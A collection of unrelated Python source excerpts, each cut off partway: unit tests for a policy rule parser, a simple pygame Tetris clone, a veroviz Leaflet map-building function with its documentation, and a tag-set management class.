self.assertEqual(check.rules, ['rule1', 'rule2'])
def test_add_check(self):
check = policy.OrCheck(['rule1', 'rule2'])
check.add_check('rule3')
self.assertEqual(check.rules, ['rule1', 'rule2', 'rule3'])
def test_str(self):
check = policy.OrCheck(['rule1', 'rule2'])
self.assertEqual(str(check), '(rule1 or rule2)')
def test_call_all_false(self):
rules = [mock.Mock(return_value=False), mock.Mock(return_value=False)]
check = policy.OrCheck(rules)
self.assertEqual(check('target', 'cred', None), False)
rules[0].assert_called_once_with('target', 'cred', None)
rules[1].assert_called_once_with('target', 'cred', None)
def test_call_first_true(self):
rules = [mock.Mock(return_value=True), mock.Mock(return_value=False)]
check = policy.OrCheck(rules)
self.assertEqual(check('target', 'cred', None), True)
rules[0].assert_called_once_with('target', 'cred', None)
self.assertFalse(rules[1].called)
def test_call_second_true(self):
rules = [mock.Mock(return_value=False), mock.Mock(return_value=True)]
check = policy.OrCheck(rules)
self.assertEqual(check('target', 'cred', None), True)
rules[0].assert_called_once_with('target', 'cred', None)
rules[1].assert_called_once_with('target', 'cred', None)
class ParseCheckTestCase(test.BaseTestCase):
def test_false(self):
result = policy._parse_check('!')
self.assertTrue(isinstance(result, policy.FalseCheck))
def test_true(self):
result = policy._parse_check('@')
self.assertTrue(isinstance(result, policy.TrueCheck))
def test_bad_rule(self):
result = policy._parse_check('foobar')
self.assertTrue(isinstance(result, policy.FalseCheck))
@mock.patch.object(policy, '_checks', {})
def test_no_handler(self):
result = policy._parse_check('no:handler')
self.assertTrue(isinstance(result, policy.FalseCheck))
@mock.patch.object(policy, '_checks', {
'spam': mock.Mock(return_value="spam_check"),
None: mock.Mock(return_value="none_check"),
})
def test_check(self):
result = policy._parse_check('spam:handler')
self.assertEqual(result, 'spam_check')
policy._checks['spam'].assert_called_once_with('spam', 'handler')
self.assertFalse(policy._checks[None].called)
@mock.patch.object(policy, '_checks', {
None: mock.Mock(return_value="none_check"),
})
def test_check_default(self):
result = policy._parse_check('spam:handler')
self.assertEqual(result, 'none_check')
policy._checks[None].assert_called_once_with('spam', 'handler')
class ParseListRuleTestCase(test.BaseTestCase):
def test_empty(self):
result = policy._parse_list_rule([])
self.assertTrue(isinstance(result, policy.TrueCheck))
self.assertEqual(str(result), '@')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_oneele_zeroele(self):
result = policy._parse_list_rule([[]])
self.assertTrue(isinstance(result, policy.FalseCheck))
self.assertEqual(str(result), '!')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_oneele_bare(self):
result = policy._parse_list_rule(['rule'])
self.assertTrue(isinstance(result, FakeCheck))
self.assertEqual(result.result, 'rule')
self.assertEqual(str(result), 'rule')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_oneele_oneele(self):
result = policy._parse_list_rule([['rule']])
self.assertTrue(isinstance(result, FakeCheck))
self.assertEqual(result.result, 'rule')
self.assertEqual(str(result), 'rule')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_oneele_multi(self):
result = policy._parse_list_rule([['rule1', 'rule2']])
self.assertTrue(isinstance(result, policy.AndCheck))
self.assertEqual(len(result.rules), 2)
for i, value in enumerate(['rule1', 'rule2']):
self.assertTrue(isinstance(result.rules[i], FakeCheck))
self.assertEqual(result.rules[i].result, value)
self.assertEqual(str(result), '(rule1 and rule2)')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_multi_oneele(self):
result = policy._parse_list_rule([['rule1'], ['rule2']])
self.assertTrue(isinstance(result, policy.OrCheck))
self.assertEqual(len(result.rules), 2)
for i, value in enumerate(['rule1', 'rule2']):
self.assertTrue(isinstance(result.rules[i], FakeCheck))
self.assertEqual(result.rules[i].result, value)
self.assertEqual(str(result), '(rule1 or rule2)')
@mock.patch.object(policy, '_parse_check', FakeCheck)
def test_multi_multi(self):
result = policy._parse_list_rule([['rule1', 'rule2'],
['rule3', 'rule4']])
self.assertTrue(isinstance(result, policy.OrCheck))
self.assertEqual(len(result.rules), 2)
for i, values in enumerate([['rule1', 'rule2'], ['rule3', 'rule4']]):
self.assertTrue(isinstance(result.rules[i], policy.AndCheck))
self.assertEqual(len(result.rules[i].rules), 2)
for j, value in enumerate(values):
self.assertTrue(isinstance(result.rules[i].rules[j],
FakeCheck))
self.assertEqual(result.rules[i].rules[j].result, value)
self.assertEqual(str(result),
'((rule1 and rule2) or (rule3 and rule4))')
class ParseTokenizeTestCase(test.BaseTestCase):
@mock.patch.object(policy, '_parse_check', lambda x: x)
def test_tokenize(self):
exemplar = ("(( ( ((() And)) or ) (check:%(miss)s) not)) "
"'a-string' \"another-string\"")
expected = [
('(', '('), ('(', '('), ('(', '('), ('(', '('), ('(', '('),
('(', '('), (')', ')'), ('and', 'And'),
(')', ')'), (')', ')'), ('or', 'or'), (')', ')'), ('(', '('),
('check', 'check:%(miss)s'), (')', ')'), ('not', 'not'),
(')', ')'), (')', ')'),
('string', 'a-string'),
('string', 'another-string'),
]
result = list(policy._parse_tokenize(exemplar))
self.assertEqual(result, expected)
class ParseStateMetaTestCase(test.BaseTestCase):
def test_reducer(self):
@policy.reducer('a', 'b', 'c')
@policy.reducer('d', 'e', 'f')
def spam():
pass
self.assertTrue(hasattr(spam, 'reducers'))
self.assertEqual(spam.reducers, [['d', 'e', 'f'], ['a', 'b', 'c']])
def test_parse_state_meta(self):
@six.add_metaclass(policy.ParseStateMeta)
class FakeState(object):
@policy.reducer('a', 'b', 'c')
@policy.reducer('d', 'e', 'f')
def reduce1(self):
pass
@policy.reducer('g', 'h', 'i')
def reduce2(self):
pass
self.assertTrue(hasattr(FakeState, 'reducers'))
for reduction, reducer in FakeState.reducers:
if (reduction == ['a', 'b', 'c'] or
reduction == ['d', 'e', 'f']):
self.assertEqual(reducer, 'reduce1')
elif reduction == ['g', 'h', 'i']:
self.assertEqual(reducer, 'reduce2')
else:
self.fail("Unrecognized reducer discovered")
class ParseStateTestCase(test.BaseTestCase):
def test_init(self):
state = policy.ParseState()
self.assertEqual(state.tokens, [])
self.assertEqual(state.values, [])
@mock.patch.object(policy.ParseState, 'reducers', [(['tok1'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True)
def test_reduce_none(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok2']
state.values = ['val2']
state.reduce()
self.assertEqual(state.tokens, ['tok2'])
self.assertEqual(state.values, ['val2'])
self.assertFalse(mock_meth.called)
@mock.patch.object(policy.ParseState, 'reducers',
[(['tok1', 'tok2'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True)
def test_reduce_short(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok1']
state.values = ['val1']
state.reduce()
self.assertEqual(state.tokens, ['tok1'])
self.assertEqual(state.values, ['val1'])
self.assertFalse(mock_meth.called)
@mock.patch.object(policy.ParseState, 'reducers',
[(['tok1', 'tok2'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True,
return_value=[('tok3', 'val3')])
def test_reduce_one(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok1', 'tok2']
state.values = ['val1', 'val2']
state.reduce()
self.assertEqual(state.tokens, ['tok3'])
self.assertEqual(state.values, | |
# Tetromino for Idiots, by <NAME> <EMAIL>
# (Pygame) Tetris, but... simpler.
import random, time, pygame, sys
from pygame.locals import *
FPS = 25
WINDOWWIDTH = 640
WINDOWHEIGHT = 480
BOXSIZE = 20
BOARDWIDTH = 10
BOARDHEIGHT = 20
BLANK = '.'
MOVESIDEWAYSFREQ = 0.15
MOVEDOWNFREQ = 0.1
XMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)
TOPMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5
# R G B
WHITE = (255, 255, 255)
GRAY = (185, 185, 185)
BLACK = ( 0, 0, 0)
RED = (155, 0, 0)
LIGHTRED = (175, 20, 20)
GREEN = ( 0, 155, 0)
LIGHTGREEN = ( 20, 175, 20)
BLUE = ( 0, 0, 155)
LIGHTBLUE = ( 20, 20, 175)
YELLOW = (155, 155, 0)
LIGHTYELLOW = (175, 175, 20)
BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
TEXTSHADOWCOLOR = GRAY
COLORS = ( BLUE, GREEN, RED, YELLOW)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)
assert len(COLORS) == len(LIGHTCOLORS) # each color must have light color
TEMPLATEWIDTH = 5
TEMPLATEHEIGHT = 5
SHAPE_TEMPLATE = [['.....',
'.....',
'..O..',
'.....',
'.....']]
PIECES = {'A': SHAPE_TEMPLATE}
def main():
global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT
pygame.init()
FPSCLOCK = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
BIGFONT = pygame.font.Font('freesansbold.ttf', 60)
pygame.display.set_caption('Tetromino for Idiots')
showTextScreen('Tetromino for Idiots')
while True: # game loop
if random.randint(0, 1) == 0:
pygame.mixer.music.load('tetrisb.mid')
else:
pygame.mixer.music.load('tetrisc.mid')
pygame.mixer.music.play(-1, 0.0)
runGame()
pygame.mixer.music.stop()
showTextScreen('Game Over')
def runGame():
# setup variables for the start of the game
board = getBlankBoard()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
lastFallTime = time.time()
movingDown = False # note: there is no movingUp variable
movingLeft = False
movingRight = False
score = 0
level, fallFreq = calculateLevelAndFallFreq(score)
fallingPiece = getNewPiece()
nextPiece = getNewPiece()
while True: # game loop
if fallingPiece == None:
# No falling piece in play, so start a new piece at the top
fallingPiece = nextPiece
nextPiece = getNewPiece()
lastFallTime = time.time() # reset lastFallTime
if not isValidPosition(board, fallingPiece):
return # can't fit a new piece on the board, so game over
checkForQuit()
for event in pygame.event.get(): # event handling loop
if event.type == KEYUP:
if (event.key == K_p):
# Pausing the game
DISPLAYSURF.fill(BGCOLOR)
pygame.mixer.music.stop()
showTextScreen('Paused') # pause until a key press
pygame.mixer.music.play(-1, 0.0)
lastFallTime = time.time()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
elif (event.key == K_LEFT or event.key == K_a):
movingLeft = False
elif (event.key == K_RIGHT or event.key == K_d):
movingRight = False
elif (event.key == K_DOWN or event.key == K_s):
movingDown = False
elif event.type == KEYDOWN:
# moving the piece sideways
if (event.key == K_LEFT or event.key == K_a) and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
movingLeft = True
movingRight = False
lastMoveSidewaysTime = time.time()
elif (event.key == K_RIGHT or event.key == K_d) and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
movingRight = True
movingLeft = False
lastMoveSidewaysTime = time.time()
# rotating the piece (if there is room to rotate)
elif (event.key == K_UP or event.key == K_w):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
elif (event.key == K_q): # rotate the other direction
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
# making the piece fall faster with the down key
elif (event.key == K_DOWN or event.key == K_s):
movingDown = True
if isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# move the current piece all the way down
elif event.key == K_SPACE:
movingDown = False
movingLeft = False
movingRight = False
for i in range(1, BOARDHEIGHT):
if not isValidPosition(board, fallingPiece, adjY=i):
break
fallingPiece['y'] += i - 1
# handle moving the piece because of user input
if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:
if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
elif movingRight and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
lastMoveSidewaysTime = time.time()
if movingDown and time.time() - lastMoveDownTime > MOVEDOWNFREQ and isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# let the piece fall if it is time to fall
if time.time() - lastFallTime > fallFreq:
# see if the piece has landed
if not isValidPosition(board, fallingPiece, adjY=1):
# falling piece has landed, set it on the board
addToBoard(board, fallingPiece)
score += removeCompleteLines(board)
level, fallFreq = calculateLevelAndFallFreq(score)
fallingPiece = None
else:
# piece did not land, just move the piece down
fallingPiece['y'] += 1
lastFallTime = time.time()
# drawing everything on the screen
DISPLAYSURF.fill(BGCOLOR)
drawBoard(board)
drawStatus(score, level)
drawNextPiece(nextPiece)
if fallingPiece != None:
drawPiece(fallingPiece)
pygame.display.update()
FPSCLOCK.tick(FPS)
def makeTextObjs(text, font, color):
surf = font.render(text, True, color)
return surf, surf.get_rect()
def terminate():
pygame.quit()
sys.exit()
def checkForKeyPress():
# Go through event queue looking for a KEYUP event.
# Grab KEYDOWN events to remove them from the event queue.
checkForQuit()
for event in pygame.event.get([KEYDOWN, KEYUP]):
if event.type == KEYDOWN:
continue
return event.key
return None
def showTextScreen(text):
# This function displays large text in the
# center of the screen until a key is pressed.
# Draw the text drop shadow
titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTSHADOWCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))
DISPLAYSURF.blit(titleSurf, titleRect)
# Draw the text
titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 2, int(WINDOWHEIGHT / 2) - 2)
DISPLAYSURF.blit(titleSurf, titleRect)
# Draw the additional "Press a key to play." text.
pressKeySurf, pressKeyRect = makeTextObjs('Press a key to play.', BASICFONT, TEXTCOLOR)
pressKeyRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)
DISPLAYSURF.blit(pressKeySurf, pressKeyRect)
while checkForKeyPress() == None:
pygame.display.update()
FPSCLOCK.tick()
def checkForQuit():
for event in pygame.event.get(QUIT): # get all the QUIT events
terminate() # terminate if any QUIT events are present
for event in pygame.event.get(KEYUP): # get all the KEYUP events
if event.key == K_ESCAPE:
terminate() # terminate if the KEYUP event was for the Esc key
pygame.event.post(event) # put the other KEYUP event objects back
def calculateLevelAndFallFreq(score):
# Based on the score, return the level the player is on and
# how many seconds pass until a falling piece falls one space.
level = int(score / 10) + 1
fallFreq = 0.27 - (level * 0.02)
return level, fallFreq
def getNewPiece():
# return a random new piece in a random rotation and color
shape = random.choice(list(PIECES.keys()))
newPiece = {'shape': shape,
'rotation': random.randint(0, len(PIECES[shape]) - 1),
'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),
'y': -2, # start it above the board (i.e. less than 0)
'color': random.randint(0, len(COLORS)-1)}
return newPiece
def addToBoard(board, piece):
# fill in the board based on piece's location, shape, and rotation
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK:
board[x + piece['x']][y + piece['y']] = piece['color']
def getBlankBoard():
# create and return a new blank board data structure
board = []
for i in range(BOARDWIDTH):
board.append([BLANK] * BOARDHEIGHT)
return board
def isOnBoard(x, y):
return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT
def isValidPosition(board, piece, adjX=0, adjY=0):
# Return True if the piece is within the board and not colliding
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
isAboveBoard = y + piece['y'] + adjY < 0
if isAboveBoard or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:
continue
if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):
return False
if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:
return False
return True
def isCompleteLine(board, y):
# Return True if the line filled with boxes with no gaps.
for x in range(BOARDWIDTH):
if board[x][y] == BLANK:
return False
return True
def removeCompleteLines(board):
# Remove any completed lines on the board, move everything above them down, and return the number of complete lines.
numLinesRemoved = 0
y = BOARDHEIGHT - 1 # start y at the bottom of the board
while y >= 0:
if isCompleteLine(board, y):
# Remove the line and pull boxes down by one line.
for pullDownY in range(y, 0, -1):
for x in range(BOARDWIDTH):
board[x][pullDownY] = board[x][pullDownY-1]
# Set very top line to blank.
for x in range(BOARDWIDTH):
board[x][0] = BLANK
numLinesRemoved += 1
# Note on the next iteration of the loop, y is the same.
# This is so that if the line that | |
<gh_stars>0
from veroviz._common import *
from veroviz._validation import valCreateLeaflet
from veroviz._validation import valAddLeafletCircle
from veroviz._validation import valAddLeafletMarker
from veroviz._validation import valAddLeafletPolygon
from veroviz._validation import valAddLeafletPolyline
from veroviz._validation import valAddLeafletText
from veroviz._internal import replaceBackslashToSlash
from veroviz._deconstructAssignments import deconstructAssignments
from veroviz.utilities import getMapBoundary
from veroviz._geometry import geoDistancePath2D
from veroviz._geometry import geoMileageInPath2D
from veroviz._geometry import geoDistance2D
foliumMaps = [
'cartodb positron',
'cartodb dark_matter',
'openstreetmap',
'stamen terrain',
'stamen toner',
'stamen watercolor'
]
customMaps = {
'arcgis aerial': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community'
},
'arcgis gray': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/Canvas/World_Light_Gray_Base/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Esri, DeLorme, NAVTEQ'
},
'arcgis ocean': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/Ocean_Basemap/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri'
},
'arcgis roadmap': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Street_Map/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'arcgis shaded relief': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Shaded_Relief/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'arcgis topo': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Topo_Map/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'open topo': {
'tiles': 'https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png',
'attr': 'Map data: © <a href="https://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, <a href="http://viewfinderpanoramas.org">SRTM</a> | Map style: © <a href="https://opentopomap.org">OpenTopoMap</a> (<a href="https://creativecommons.org/licenses/by-sa/3.0/">CC-BY-SA</a>)'
},
}
def createLeaflet(mapObject=None, mapFilename=None, mapBackground=VRV_DEFAULT_LEAFLET_MAPTILES, mapBoundary=None, zoomStart=None, nodes=None, iconPrefix=None, iconType=None, iconColor=None, iconText=None, arcs=None, arcWeight=None, arcStyle=None, arcOpacity=None, arcColor=None, useArrows=None, boundingRegion=None, boundingWeight=VRV_DEFAULT_LEAFLETBOUNDINGWEIGHT, boundingOpacity=VRV_DEFAULT_LEAFLETBOUNDINGOPACITY, boundingStyle=VRV_DEFAULT_LEAFLETBOUNDINGSTYLE, boundingColor=VRV_DEFAULT_LEAFLETBOUNDINGCOLOR):
"""
createLeaflet is used to generate Leaflet objects using folium. The function takes a boundingRegion polygon, `Nodes`, `Arcs`, and `Assignments` dataframes as inputs, and creates a folium/leaflet map showing boundings, nodes and/or arcs.
Parameters
----------
mapObject: Folium object, Optional, default as None
If you already have a map (as a Folium object), you can provide that object and add content to that map.
mapFilename: string, Optional, default as None
This is the name of the map file that will be created (e.g., "../output/map.html" or "map.html"). The filename should have a `.html` extension. If `mapFilename` is not provided, no map file will be generated. The returned map object can be viewed within a Jupyter notebook.
mapBackground: string, Optional, default as 'CartoDB positron'
Sets the background tiles of the map. See :ref:`Leaflet Style` for the list of options.
mapBoundary: list of lists, Optional, default as None
Allows customization of the zoom level. If a map boundary is provided, the zoom level will correspond to the rectangle defined by the two map boundary points. This feature is useful if you want to create multiple comparison maps, each with the same zoom level and centering. Must be in the form [[south lat, west lon], [north lat, east lon]].
zoomStart: int, Optional, default as None
Specifies the default zoom level. 1 --> global view; 18 --> max zoom. Note that some map tiles have maximum zoom levels less than 18. The `zoomStart` will be overridden by a `mapBoundary` (if one is provided).
nodes: :ref:`Nodes`, Conditional, `nodes`, `arcs`, and `boundingRegion` can not be None at the same time
A Nodes dataframe describing the collection of nodes to be displayed on the Leaflet map. See :ref:`Nodes` for documentation on this type of dataframe.
iconPrefix: string, Optional, default as None
Overrides the `leafletIconPrefix` column of an input :ref:`Nodes` dataframe. If provided, all nodes will use this icon prefix. Valid options are "glyphicon" or "fa". See :ref:`Leaflet Style` for details.
iconType: string, Optional, default as None
Overrides the `leafletIconType` column of an input :ref:`Nodes` dataframe. If provided, all nodes will use this icon type. The valid `iconType` options depend on the choice of `iconPrefix`. See :ref:`Leaflet Style` for the collection of valid icon prefix/type combinations.
iconColor: string, Optional, default as None
Overrides the `leafletColor` column of an input :ref:`Nodes` dataframe. If provided, all icons will use this color when displayed on this Leaflet map. See :ref:`Leaflet Style` for the list of available color options.
iconText: string, Optional, default as None
Overrides the `leafletIconText` column of an input :ref:`Nodes` dataframe. If provided, all node markers in this Leaflet map will include this text as a label (you will need to click on the marker in the map to see this label).
arcs: :ref:`Arcs` or :ref:`Assignments`, Conditional, `nodes`, `arcs` and `boundingRegion` can not be None at the same time
An :ref:`Arcs` or :ref:`Assignments` dataframe describing vehicle routes. Each row of this dataframe will be shown as a line on the Leaflet map. See the documentation on :ref:`Arcs` and :ref:`Assignments` for more information.
arcWeight: int, Optional, default as None
Overrides the `leafletWeight` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this line thickness (in pixels).
arcStyle: string, Optional, default as None
Overrides the `leafletStyle` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this type. Valid options are 'solid', 'dotted', or 'dashed'. See :ref:`Leaflet Style` for more information.
arcOpacity: float in [0, 1], Optional, default as None
Overrides the `leafletOpacity` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, each arc will be displayed with this opacity. Valid values are in the range from 0 (invisible) to 1 (no transparency).
arcColor: string, Optional, default as None
Overrides the `leafletColor` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this color. See :ref:`Leaflet Style` for a list of available colors.
useArrows: boolean, Optional, default as None
Indicates whether arrows should be shown on all arcs on the Leaflet map.
boundingRegion: list of lists, Conditional, `nodes`, `arcs` and `boundingRegion` can not be None at the same time
A sequence of lat/lon coordinates defining a boundary polygon. The format is [[lat, lon], [lat, lon], ..., [lat, lon]].
boundingWeight: int, Optional, default as 3
Specifies the weight (in pixels) of the line defining the `boundingRegion` (if provided) when displayed in Leaflet.
boundingStyle: string, Optional, default as 'dashed'
Specifies the line style of the `boundingRegion` (if provided). Valid options are 'solid', 'dotted', 'dashed'. See :ref:`Leaflet Style` for more information.
boundingOpacity: float in [0, 1], Optional, default as 0.6
Specifies the opacity of the `boundingRegion` (if provided) when displayed in Leaflet. Valid values are in the range from 0 (invisible) to 1 (no transparency).
boundingColor: string, Optional, default as 'brown'
Specifies the line color of the `boundingRegion` (if provided) when displayed in Leaflet. See :ref:`Leaflet Style` for a list of available colors.
Return
------
Folium object
A new/updated map that displays the nodes, arcs, and/or bounding region.
Examples
--------
First, import veroviz and check the latest version
>>> import veroviz as vrv
>>> vrv.checkVersion()
Now, generate some example nodes inside a bounding region
>>> bounding = [
... [42.98355351219673, -78.90518188476564],
... [43.04731443361136, -78.83857727050783],
... [43.02221961002041, -78.7108612060547],
... [42.92777124914475, -78.68957519531251],
... [42.866402688514626, -78.75343322753908],
... [42.874957707517865, -78.82415771484375],
... [42.90111863978987, -78.86878967285158],
... [42.92224052343343, -78.8921356201172]]
>>> exampleNodes = vrv.generateNodes(
... nodeType = 'customer',
... nodeDistrib = 'normalBB',
... nodeDistribArgs = {
... 'center' : [42.90, -78.80],
... 'stdDev' : 10000,
... 'boundingRegion' : bounding
... },
... numNodes = 3,
... leafletColor = 'orange')
The first example is using all default setting for generating a set of given nodes in Nodes dataframe.
>>> vrv.createLeaflet(nodes=exampleNodes)
Define some arcs based on the nodes we just generated:
>>> exampleArcs = vrv.createArcsFromNodeSeq(
... nodes = exampleNodes,
... nodeSeq = [1, 2, 3])
>>> exampleArcs
Display the nodes, arcs, and bounding region simultaneously:
>>> vrv.createLeaflet(
... nodes = exampleNodes,
... arcs = exampleArcs,
... boundingRegion = bounding)
The createLeaflet function provides options to override styles that were defined in the input nodes and/or arcs dataframes. Note: These overrides will not change the contents in the dataframes.
>>> nodesAndArcsMap = vrv.createLeaflet(
... nodes = exampleNodes,
... iconPrefix = 'fa',
... iconType = 'car',
... iconColor = 'blue',
... arcs = exampleArcs,
... arcStyle = 'dotted')
>>> nodesAndArcsMap
If you already have a folium map object, you can add more into it.
Here, we add a bounding region to the `nodesAndArcsMap` object defined above.
>>> nodesAndArcsMap = vrv.createLeaflet(
... mapObject = nodesAndArcsMap,
... boundingRegion = bounding)
>>> nodesAndArcsMap
A new collection of nodes is defined here:
>>> newNodes = vrv.generateNodes(
... nodeType = 'customer',
... nodeDistrib = 'uniformBB',
... nodeDistribArgs = {
... 'boundingRegion' : bounding
... },
... numNodes = 4,
... leafletColor = 'red')
>>> newNodes
We will add these nodes to our existing map,
but we're overriding these new nodes with a green color:
Notice that the addition of new entities will not change the style of previous entities that were already added into the | |
from __future__ import annotations
from enum import Enum
import logging
import copy
log = logging.getLogger(__name__)
class TagType(Enum):
REQUIRE = 2
PREFER = 1
ACCEPT = 0
REJECT = -1
def __int__(self):
return self.value
class Tag:
def __init__(self, name, value, tag_type: Enum):
self.name = name
self.value = value
self.tag_type = tag_type
def __eq__(self, other):
if not isinstance(other, Tag):
# don't attempt to compare against unrelated types
return NotImplemented
return self.name == other.name and self.value == other.value and self.tag_type == other.tag_type
def __repr__(self):
return f"<Tag: name={self.name}, value={self.value}, type={self.tag_type}>"
class IncompatibleTagsException(Exception):
def __init__(self, first_set, second_set):
super().__init__(
f"Cannot combine tag sets because require and reject tags mismatch. First tag set requires:"
f" {[tag.value for tag in first_set.filter(TagType.REQUIRE)]} and rejects:"
f" {[tag.value for tag in first_set.filter(TagType.REJECT)]}. Second tag set requires:"
f" {[tag.value for tag in second_set.filter(TagType.REQUIRE)]} and rejects:"
f" {[tag.value for tag in second_set.filter(TagType.REJECT)]}.")
class TagSetManager(object):
def __init__(self, tags=[]):
self.tags = tags or []
def add_tag_override(self, tag: Tag):
# pop the tag if it exists, as a tag can only belong to one type
self.tags = list(filter(lambda t: t.value != tag.value, self.tags))
self.tags.append(tag)
def filter(self, tag_type: TagType | list[TagType] = None,
tag_name: str = None, tag_value: str = None) -> list[Tag]:
filtered = self.tags
if tag_type:
if isinstance(tag_type, TagType):
filtered = (tag for tag in filtered if tag.tag_type == tag_type)
else:
filtered = (tag for tag in filtered if tag.tag_type in tag_type)
if tag_name:
filtered = (tag for tag in filtered if tag.name == tag_name)
if tag_value:
filtered = (tag for tag in filtered if tag.value == tag_value)
return filtered
def add_tag_overrides(self, tags: list[Tag]):
for tag in tags:
self.add_tag_override(tag)
def can_combine(self, other: TagSetManager) -> bool:
self_required = ((t.name, t.value) for t in self.filter(TagType.REQUIRE))
other_required = ((t.name, t.value) for t in other.filter(TagType.REQUIRE))
self_rejected = ((t.name, t.value) for t in self.filter(TagType.REJECT))
other_rejected = ((t.name, t.value) for t in other.filter(TagType.REJECT))
if set(self_required).intersection(set(other_rejected)):
return False
elif set(self_rejected).intersection(set(other_required)):
return False
else:
return True
def inherit(self, other) -> TagSetManager:
assert type(self) == type(other)
new_tag_set = TagSetManager()
new_tag_set.add_tag_overrides(other.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(other.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(other.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(other.filter(TagType.REJECT))
new_tag_set.add_tag_overrides(self.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(self.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(self.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(self.filter(TagType.REJECT))
return new_tag_set
def combine(self, other: TagSetManager) -> TagSetManager:
if not self.can_combine(other):
raise IncompatibleTagsException(self, other)
new_tag_set = TagSetManager()
# Add accept tags first, as they should be overridden by prefer, require and reject tags
new_tag_set.add_tag_overrides(other.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(self.filter(TagType.ACCEPT))
# Next add preferred, as they should be overridden by require and reject tags
new_tag_set.add_tag_overrides(other.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(self.filter(TagType.PREFER))
# Require and reject tags can be added in either order, as there's no overlap
new_tag_set.add_tag_overrides(other.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(self.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(other.filter(TagType.REJECT))
new_tag_set.add_tag_overrides(self.filter(TagType.REJECT))
return new_tag_set
def match(self, other: TagSetManager) -> bool:
